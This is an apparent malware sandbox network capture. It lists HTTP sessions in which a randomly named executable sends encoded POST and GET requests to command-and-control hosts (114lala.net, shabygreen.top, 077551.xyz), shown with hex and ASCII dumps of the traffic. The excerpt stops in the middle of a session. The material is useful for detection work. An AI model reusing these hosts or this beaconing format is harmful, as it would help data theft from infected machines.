                                                          Data Ascii: TvpPfhGp=6qKcr8k3+KM/Don833M++jF1RxOcBkHHmW/e5I88T2/i0LKI+RT7rNhBPSOUdCkaw+kc15TewBBgwJ4iKqVpf8Cf1OhbloC59TtOVDvoPXUiFiO/eiCHr/awefFzsjbXJnDn98gISq7zxAOQUiTWXZTdTkQ+6Zc6jTey0GWOtDFX7DSi734C7eAf5bD8WXBiHQ==
                                                          Jul 3, 2024 15:57:28.431289911 CEST240INHTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:45 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
                                                          Jul 3, 2024 15:57:28.431312084 CEST539INData Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449747154.23.7.170801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:29.927300930 CEST743OUTPOST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 46 49 33 38 6e 67 59 2b 72 7a 46 30 55 78 4f 63 4b 45 48 4c 6d 57 7a 65 35 4a 35 6a 53 45 62 69 33 70 43 49 39 51 54 37 71 4e 68 42 48 79 4f 72 54 69 6b 72 77 2b 6f 55 31 38 7a 65 77 42 46 67 77 49 49 69 4b 5a 39 71 46 4d 43 64 39 75 68 5a 6f 49 43 35 39 54 74 4f 56 48 48 47 50 58 63 69 46 53 2b 2f 66 42 61 45 68 66 61 78 4f 2f 46 7a 6d 44 62 4c 4a 6e 44 42 39 34 42 74 53 73 2f 7a 78 42 2b 51 58 7a 54 58 4f 70 53 57 4e 6b 52 50 39 35 68 75 37 7a 2f 6d 31 58 2b 6f 77 41 6b 79 33 6c 44 34 71 47 5a 56 70 65 6b 73 6b 63 4b 49 62 55 38 72 63 54 6b 31 4e 57 56 6f 57 76 30 34 30 62 63 4c 76 61 5a 4a 37 31 59 3d
                                                          Data Ascii: TvpPfhGp=6qKcr8k3+KM/FI38ngY+rzF0UxOcKEHLmWze5J5jSEbi3pCI9QT7qNhBHyOrTikrw+oU18zewBFgwIIiKZ9qFMCd9uhZoIC59TtOVHHGPXciFS+/fBaEhfaxO/FzmDbLJnDB94BtSs/zxB+QXzTXOpSWNkRP95hu7z/m1X+owAky3lD4qGZVpekskcKIbU8rcTk1NWVoWv040bcLvaZJ71Y=
                                                          Jul 3, 2024 15:57:30.833509922 CEST240INHTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:49 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
                                                          Jul 3, 2024 15:57:30.833620071 CEST539INData Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449748154.23.7.170801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:33.170799017 CEST10825OUTPOST /ixzv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          Origin: http://www.114lala.net
                                                          Referer: http://www.114lala.net/ixzv/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 36 71 4b 63 72 38 6b 33 2b 4b 4d 2f 46 49 33 38 6e 67 59 2b 72 7a 46 30 55 78 4f 63 4b 45 48 4c 6d 57 7a 65 35 4a 35 6a 53 45 54 69 30 61 61 49 2f 7a 37 37 34 64 68 42 4a 53 4f 51 54 69 6b 4d 77 2b 77 51 31 38 2b 70 77 48 5a 67 7a 75 63 69 42 4d 42 71 4c 38 43 64 78 4f 68 61 6c 6f 43 57 39 53 63 48 56 44 62 47 50 58 63 69 46 55 79 2f 59 53 43 45 6e 66 61 77 65 66 46 33 73 6a 62 76 4a 6b 79 36 39 34 45 59 52 63 66 7a 78 68 75 51 57 42 37 58 52 5a 53 55 5a 45 52 58 39 35 74 59 37 77 62 71 31 58 36 53 77 48 55 79 6d 52 53 30 37 48 70 57 6f 4d 4a 2f 77 4f 6d 64 5a 47 63 55 56 68 4a 51 4b 6b 31 51 47 65 6b 68 2f 35 42 44 31 2f 64 69 75 67 45 6c 4a 52 66 6e 79 74 70 6e 36 64 31 35 33 44 76 6d 53 6f 57 74 4c 34 74 74 39 77 72 2f 2f 50 32 55 4a 48 50 49 7a 79 52 52 30 75 32 72 6d 53 6a 45 59 45 75 55 38 73 79 42 70 6a 62 75 62 54 65 39 50 44 68 49 46 4c 35 52 57 78 66 75 4e 61 74 37 58 2b 6c 35 43 46 55 72 57 6c 53 59 68 70 56 57 58 67 78 6c 58 46 53 35 63 62 66 79 4a 6e 51 79 47 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=6qKcr8k3+KM/FI38ngY+rzF0UxOcKEHLmWze5J5jSETi0aaI/z774dhBJSOQTikMw+wQ18+pwHZgzuciBMBqL8CdxOhaloCW9ScHVDbGPXciFUy/YSCEnfawefF3sjbvJky694EYRcfzxhuQWB7XRZSUZERX95tY7wbq1X6SwHUymRS07HpWoMJ/wOmdZGcUVhJQKk1QGekh/5BD1/diugElJRfnytpn6d153DvmSoWtL4tt9wr//P2UJHPIzyRR0u2rmSjEYEuU8syBpjbubTe9PDhIFL5RWxfuNat7X+l5CFUrWlSYhpVWXgxlXFS5cbfyJnQyGhOk/kMiXZXUvg83bWX0wN4q4K0b6yACz6WIhiUrl4aVmbT5OlPsYX2DEhbZApWsp2UP1NURWL45KjZx0VNapHT+fIa1FbjOEd89C5tcffwPnL1f9NvCIQ+Ox+cS7SeYbotgFqBcTWq8GCzQx1mpXMFKdrmjYIjNdf6RqPOFmai2ypYFmbe2cg66nEyE0BeGLH/fw45kq3ur7AdClu/+/EH6h+Xr3oQ4+7lAIMwZK98IYWCPry/reVJ4Z9D0XJTef3lih2O0ZFIzlQlE7gwjAsMO31VHo+5Fi5BS9lTlCcltWyR3ykfQgrk+EoVNqTSjdgY9Hg3UBjq8FKd4/1LD57cH+lkDSwozO5L82xpSxGDdNEOAeUVLEvS234iFcVbUEk6oa8GlXzLYnIwSgup2r24WHvtBm4Ycptz5ebt/9a9QqY5Kg9vKvnXvEyqo7LbWw/SyWhdRQdV8yRai6abVVJjqjF9V0pqRIgPjtBqtCvSmvoIPIhS0DQJ7NErSQHdt+x81qg3PLTRtkujPLOXx4XkaGFEMjHIxKMhf9Pc4RESKHk9/zS0u6GFfL/w6RK8HgQ2D0+85UvLe60bRCz6IkTHhq0TVMesAJy40GoHmvi7wuVoW6F7zToG+rgut3HTCPZCJCKuFiR45H4Y0JXbmNI3JrVwOdKS3tWi [TRUNCATED]
                                                          Jul 3, 2024 15:57:34.069240093 CEST240INHTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Encoding: gzip
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:52 GMT
                                                          Connection: close
                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                          Data Ascii: a
                                                          Jul 3, 2024 15:57:34.069585085 CEST539INData Raw: 32 30 32 0d 0a 9d 52 31 8f d3 30 14 de fb 2b 2c 2f 49 25 6a 5f c5 0d f4 9a 64 38 04 63 c5 70 1b 62 70 1c 37 71 49 ec 60 bf 34 6d d1 49 30 20 1d d3 9d d8 90 6e 40 20 06 24 06 26 84 40 3a 7e 4d ab bb 89 bf 80 d3 84 bb 82 60 e1 49 b1 f5 f2 de f7 bd
                                                          Data Ascii: 202R10+,/I%j_d8cpbp7qI`4mI0 n@ $&@:~M`I>9Z!J&mMJ.L]YBh^Bw'./.6_7o?O>_={9yl7h5eI%!8113V@Xtp#zPV?!gs


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449749154.23.7.170801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:35.711591005 CEST460OUTGET /ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.114lala.net
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:36.616875887 CEST209INHTTP/1.1 200 OK
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                          X-Powered-By: Nginx
                                                          Date: Wed, 03 Jul 2024 13:57:55 GMT
                                                          Connection: close
                                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                          Data Ascii: 3
                                                          Jul 3, 2024 15:57:36.616898060 CEST890INData Raw: 33 36 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e8 90
                                                          Data Ascii: 36e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = documen


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449750203.161.41.205801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:41.703834057 CEST732OUTPOST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 48 61 6e 73 66 7a 4a 6c 67 70 36 75 6b 51 64 34 48 6f 67 62 58 4d 4c 4d 74 56 4e 38 50 63 38 43 6f 42 59 64 6d 41 38 65 2b 74 61 65 45 4e 53 30 58 36 7a 51 39 6d 62 4a 4e 45 54 59 66 33 59 32 2b 32 35 46 58 36 4c 32 41 73 35 4c 41 4b 4d 32 4d 78 35 59 43 49 36 67 35 6a 6f 4e 71 77 33 50 4a 75 31 7a 34 66 6c 4c 33 55 55 73 68 33 37 71 63 4e 4b 68 46 64 38 70 6e 67 2f 4b 58 79 66 67 61 63 2b 50 32 57 68 58 4e 62 2f 34 64 35 69 57 6e 74 6f 69 30 50 5a 4c 6a 65 31 32 49 46 6e 38 7a 39 37 4f 73 61 71 52 2b 4e 35 2b 52 61 48 6e 75 47 2b 49 39 77 3d 3d
                                                          Data Ascii: TvpPfhGp=tjt85DCus9MpHansfzJlgp6ukQd4HogbXMLMtVN8Pc8CoBYdmA8e+taeENS0X6zQ9mbJNETYf3Y2+25FX6L2As5LAKM2Mx5YCI6g5joNqw3PJu1z4flL3UUsh37qcNKhFd8png/KXyfgac+P2WhXNb/4d5iWntoi0PZLje12IFn8z97OsaqR+N5+RaHnuG+I9w==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449751203.161.41.205801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:44.253186941 CEST752OUTPOST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 47 36 58 73 5a 55 31 6c 69 4a 36 74 72 77 64 34 4f 49 67 66 58 4d 48 4d 74 52 63 6e 4d 75 59 43 70 67 6f 64 6e 43 45 65 39 74 61 65 63 39 53 74 49 71 7a 62 39 6d 47 2b 4e 42 72 59 66 33 38 32 2b 7a 56 46 57 4e 33 31 42 38 35 4a 49 71 4d 6f 43 52 35 59 43 49 36 67 35 69 4d 6e 71 77 76 50 49 65 6c 7a 33 61 46 49 72 45 55 74 32 48 37 71 52 74 4b 74 46 64 38 48 6e 68 7a 77 58 77 6e 67 61 64 4f 50 32 6a 56 57 55 72 2f 2b 5a 35 69 48 68 4d 78 51 74 63 68 43 6c 49 70 31 41 45 62 67 79 37 71 55 39 72 4c 47 73 4e 64 4e 4d 64 4f 54 6a 46 44 42 6d 33 7a 62 6d 62 49 66 55 34 61 50 52 36 74 36 37 45 77 44 50 4a 41 3d
                                                          Data Ascii: TvpPfhGp=tjt85DCus9MpG6XsZU1liJ6trwd4OIgfXMHMtRcnMuYCpgodnCEe9taec9StIqzb9mG+NBrYf382+zVFWN31B85JIqMoCR5YCI6g5iMnqwvPIelz3aFIrEUt2H7qRtKtFd8HnhzwXwngadOP2jVWUr/+Z5iHhMxQtchClIp1AEbgy7qU9rLGsNdNMdOTjFDBm3zbmbIfU4aPR6t67EwDPJA=
                                                          Jul 3, 2024 15:57:44.948184013 CEST533INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:44 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449752203.161.41.205801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:46.889579058 CEST10834OUTPOST /4n8t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          Origin: http://www.shabygreen.top
                                                          Referer: http://www.shabygreen.top/4n8t/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 74 6a 74 38 35 44 43 75 73 39 4d 70 47 36 58 73 5a 55 31 6c 69 4a 36 74 72 77 64 34 4f 49 67 66 58 4d 48 4d 74 52 63 6e 4d 75 51 43 70 57 55 64 6d 6c 6f 65 38 74 61 65 56 64 53 6f 49 71 7a 47 39 6d 4f 36 4e 42 75 74 66 78 34 32 2f 52 64 46 52 35 6a 31 4f 38 35 4a 45 4b 4d 31 4d 78 35 4e 43 49 71 6b 35 6a 38 6e 71 77 76 50 49 59 68 7a 77 50 6c 49 70 45 55 73 68 33 37 2b 63 4e 4b 4a 46 64 6b 78 6e 68 6e 67 58 45 62 67 61 2b 32 50 6c 6c 35 57 63 72 2f 47 63 35 6a 61 68 4d 4e 4c 74 63 38 37 6c 49 30 51 41 45 2f 67 78 74 76 78 74 62 66 51 7a 2f 78 49 53 39 6d 4a 6b 6c 36 47 68 58 58 6e 73 75 45 56 4d 4a 65 58 4a 71 6b 6b 67 45 70 44 53 35 39 7a 48 34 51 6c 79 4e 46 7a 52 53 44 38 4c 6e 7a 59 75 50 56 66 59 6c 58 52 59 6b 39 56 4e 62 41 76 47 54 44 48 34 4f 2f 4e 72 43 49 4c 54 6d 6e 4d 75 41 35 42 42 72 33 38 70 33 31 51 48 56 71 35 38 78 72 74 70 2f 62 4d 38 4a 4e 7a 42 36 6a 57 56 68 70 76 75 64 30 2f 6f 2b 63 42 67 4f 64 64 61 35 41 38 6e 47 31 2f 4f 39 75 63 6b 50 39 6b 38 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=tjt85DCus9MpG6XsZU1liJ6trwd4OIgfXMHMtRcnMuQCpWUdmloe8taeVdSoIqzG9mO6NButfx42/RdFR5j1O85JEKM1Mx5NCIqk5j8nqwvPIYhzwPlIpEUsh37+cNKJFdkxnhngXEbga+2Pll5Wcr/Gc5jahMNLtc87lI0QAE/gxtvxtbfQz/xIS9mJkl6GhXXnsuEVMJeXJqkkgEpDS59zH4QlyNFzRSD8LnzYuPVfYlXRYk9VNbAvGTDH4O/NrCILTmnMuA5BBr38p31QHVq58xrtp/bM8JNzB6jWVhpvud0/o+cBgOdda5A8nG1/O9uckP9k8foVeJGXrSyqFk1+nE3ZPEERMSkqs3VMMiJl36Zp5Mo2qJ9O2DbsFgNUemnDI2lD0SdhfvHtdB5TdAcJ/l93tCXwcJZXy49e2+1O+O6MDr0LpWZ+V522MkSGxq1mDwv0ohv7gkxNT+mBGy7uS4X4lphDRlqneAgcsXEFtYqA+EzyO0rAkJF5HR8fz5WM66hC00jNqmc0pMCPp/Gg7BT6Santw9/u9Ulfb1CjWPojRdTqZiS93JeSNA0UjkX2vRbmul7M8yq5SNj7D0UrASLCsoVnDNP0EbxcuPegb2NImBr4Cmp/Q5tKhDYgL2/fouBNK6rqVcKkrft+BcPRIGRNAkCKeU1yla70dCFbG1mYo5Q5JtBIHTdWX2Hly6TS07RRtSKdiQsc+vI3HWe3LWeJmxq3y4268YEE2WxNq08C9t7TjL5st4x/gop8jW4DofCHbWzH+YznbuXa+qCKAFRw1nLf28ITjxwJCPQ5inbTh+t9YWMYxlLZLxAfqAbGgFy1tDW0OyxTwl6FJogcbaHYLH3rj2h3Qp3jf0d3gOwKDiJ7KaUo96hU3/tYqdqXe0PRzLQIseFSsdZupV/w+Fl2W9w8FH6UKLhVsxABDcEHfpIZ8QIEogZ9mUHmJ19ARjWM/EwO/4fA2V8GIVch/UMpMIRbu4O3J0GvGc9 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449753203.161.41.205801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:49.428736925 CEST463OUTGET /4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.shabygreen.top
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:57:51.156693935 CEST548INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:49 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.449754104.21.84.69801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:56.202965021 CEST720OUTPOST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
